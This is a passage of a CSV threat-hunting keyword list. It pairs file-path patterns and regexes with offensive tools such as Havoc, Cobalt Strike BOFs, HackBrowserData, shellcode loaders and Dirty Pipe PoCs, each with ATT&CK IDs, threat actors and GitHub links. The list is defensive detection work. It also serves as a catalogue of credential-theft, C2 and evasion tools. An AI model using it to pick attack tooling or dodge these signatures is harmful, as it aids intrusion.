- T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/guessed_emails.txt*",".{0,1000}\/guessed_emails\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*/gyaansastra/CVE-2022-0847*",".{0,1000}\/gyaansastra\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/GzipB64.exe*",".{0,1000}\/GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*/h8mail/*",".{0,1000}\/h8mail\/.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*/HackBrowserData*",".{0,1000}\/HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*/hackerid.py*",".{0,1000}\/hackerid\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/hackingtool.git*",".{0,1000}\/hackingtool\.git.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*/Hack-Tools.git*",".{0,1000}\/Hack\-Tools\.git.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*/Hades.exe*",".{0,1000}\/Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/hades.git*",".{0,1000}\/hades\.git.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/HadesLdr.git*",".{0,1000}\/HadesLdr\.git.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*/hades-main.zip*",".{0,1000}\/hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*/hadoop-datanode-info.nse*",".{0,1000}\/hadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-jobtracker-info.nse*",".{0,1000}\/hadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-namenode-info.nse*",".{0,1000}\/hadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-secondary-namenode-info.nse*",".{0,1000}\/hadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hadoop-tasktracker-info.nse*",".{0,1000}\/hadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Hak5.sh*",".{0,1000}\/Hak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/hakrawler.git*",".{0,1000}\/hakrawler\.git.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*/hancitor.profile*",".{0,1000}\/hancitor\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/HandleHijacker.cpp*",".{0,1000}\/HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/HandleHijacker.hpp*",".{0,1000}\/HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*/handlekatz.py*",".{0,1000}\/handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/HandleKatz_BOF*",".{0,1000}\/HandleKatz_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","93","17","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z" "*/HarmJ0y*",".{0,1000}\/HarmJ0y.{0,1000}","offensive_tool_keyword","Github Username","Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/HarmJ0y","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/HaryyUser.exe*",".{0,1000}\/HaryyUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/hash_spider.py*",".{0,1000}\/hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/hashcat*",".{0,1000}\/hashcat.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/hashcat-rule.git*",".{0,1000}\/hashcat\-rule\.git.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*/hashdump_dc*",".{0,1000}\/hashdump_dc.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/hashesorg2019.gz*",".{0,1000}\/hashesorg2019\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*/Hashi0x/*",".{0,1000}\/Hashi0x\/.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hashview.py*",".{0,1000}\/hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "*/havex.profile*",".{0,1000}\/havex\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/Havoc.cpp*",".{0,1000}\/Havoc\.cpp.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc.qss*",".{0,1000}\/Havoc\.qss.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc.rc*",".{0,1000}\/Havoc\.rc.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc/data/*",".{0,1000}\/Havoc\/data\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/Havoc/main/*",".{0,1000}\/Havoc\/main\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/HavocFramework/*",".{0,1000}\/HavocFramework\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/HavocImages/*",".{0,1000}\/HavocImages\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/havoc-py/*",".{0,1000}\/havoc\-py\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/hbase-master-info.nse*",".{0,1000}\/hbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hbase-region-info.nse*",".{0,1000}\/hbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hddtemp-info.nse*",".{0,1000}\/hddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/hDendron.cs*",".{0,1000}\/hDendron\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*/HeapCrypt.git*",".{0,1000}\/HeapCrypt\.git.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","228","43","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*/HellHall.git*",".{0,1000}\/HellHall\.git.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*/HellsGate.git*",".{0,1000}\/HellsGate\.git.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*/HellsHall.exe*",".{0,1000}\/HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","1","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*/Heroinn.git*",".{0,1000}\/Heroinn\.git.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/Heroinn/*",".{0,1000}\/Heroinn\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/heroinn_client/*",".{0,1000}\/heroinn_client\/.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*/hid_inject.*",".{0,1000}\/hid_inject\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/hid_sniff.*",".{0,1000}\/hid_sniff\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 